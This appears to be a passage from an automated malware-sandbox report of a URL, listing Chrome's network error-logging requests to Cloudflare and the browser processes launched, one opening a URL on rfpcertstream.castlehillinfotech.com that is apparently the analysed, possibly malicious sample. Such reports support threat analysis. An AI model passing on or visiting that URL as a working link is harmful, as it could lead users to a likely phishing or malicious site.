                                                      2024-03-05 13:25:35 UTC481OUTPOST /report/v3?s=t2XtQZ7IrgLo%2B6%2FQ%2FlfV7NC4C7HNPD2jOpTEhnnufHBTudhN0Hsvy4fb8ExsQEQqOX0DCIHvg%2FXAPrQZ2RIqkIOId2e57I4UHShefTBnpBhck9eP%2F49f3%2FOfobYkaLY%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 1842
                                                      Content-Type: application/reports+json
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:25:35 UTC1842OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 33 30 39 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 32 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 70 76 61 6e 63 65 2e 63 6f 6d 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 6f 66 72 41 7a 51 78 68 44 6b 64 5a 48 63 57 4c 45 67 5f 57 69 39 56 6b 37 38 49 57 33 2e 66 47 63 59 57 61 58 64 45 44 6d 31 67 2d 31 37 30 39 36 34 35 30 37 34 2d 30 2e 30 2e 31 2e 31 2d 31 35 35 37 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34
                                                      Data Ascii: [{"age":33095,"body":{"elapsed_time":428,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://ampvance.com/?__cf_chl_tk=ofrAzQxhDkdZHcWLEg_Wi9Vk78IW3.fGcYWaXdEDm1g-1709645074-0.0.1.1-1557","sampling_fraction":1.0,"server_ip":"104
                                                      2024-03-05 13:25:35 UTC168INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      date: Tue, 05 Mar 2024 13:25:35 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      49192.168.2.54977435.190.80.14433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:35 UTC477OUTPOST /report/v3?s=Xmr%2BexqgQZuZn%2FurIC87BBzwJ9V5F9jLSZs6qa6uqe2ogtVUeJgOKLzpa1xSbF1k4KlypJ13JvGX2ytffNhC1lSDahGag%2BrXvgqVH2oAOO0L6eA%2Bb9EKs03tibfKPaU%3D HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 1048
                                                      Content-Type: application/reports+json
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-03-05 13:25:35 UTC1048OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 37 36 32 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 31 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 31 2e 32 32 39 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 70 76 61 6e 63 65 2e 63 6f 6d
                                                      Data Ascii: [{"age":57621,"body":{"elapsed_time":616,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.81.229","status_code":400,"type":"http.error"},"type":"network-error","url":"https://ampvance.com
                                                      2024-03-05 13:25:35 UTC168INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      date: Tue, 05 Mar 2024 13:25:35 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:14:24:23
                                                      Start date:05/03/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                      Imagebase:0x7ff715980000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:14:24:27
                                                      Start date:05/03/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 --field-trial-handle=2380,i,5816646671808704860,14953583853610875353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                      Imagebase:0x7ff715980000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:14:24:29
                                                      Start date:05/03/2024
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
                                                      Imagebase:0x7ff715980000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      No disassembly